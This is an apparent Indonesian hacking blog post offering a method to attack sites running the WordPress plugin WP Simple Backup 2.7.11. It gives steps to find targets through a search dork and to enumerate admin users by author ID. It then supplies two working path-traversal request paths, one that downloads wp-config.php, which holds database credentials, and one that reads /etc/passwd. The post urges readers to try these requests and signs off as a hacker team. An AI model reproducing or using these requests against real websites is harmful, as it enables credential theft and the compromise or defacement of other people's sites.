saya ingin membagikan sebuah Methode deface Wordpress Plugins WP Simple Backup 2.7.11 Local File Download&Local File Inclusion
how to use it ? how to do ? let see ..
Dork : N/A
Penjelasan :
Plugins Wordpress ini sangat Responsible sehingga saat kita menggunakan exploit tertentu akan mendownload suatu file berupa .tar extension yang berisi sebuah Informasi suatu struktur database website yang menjadi target kita ...
POC :
1.find Targets Wordpress (use inurl:/wp-login.php)
2.See the author .. how ? site/author?=1,site/author?=2 dan seterusnya jika setelah angka 1 404 not found brarti single admin atau tidak ada user level lain hanya 1 admin saja .
3.now .. downloaded the files using this exploit :
/wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../wp-config.php < Downloaded With tools.php Affected Virus By PizzahatHackers
or
/wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../../../../../etc/passwd < Local File Inclusion
Now,Try!
/End
Terima Kasih Mr.XSecr3t | Indonesian Cyber DarkNet Team :)
0 Response to "Wordpress Plugins WP Simple Backup 2.7.11 Local File Download&Local File Inclusion"
Post a Comment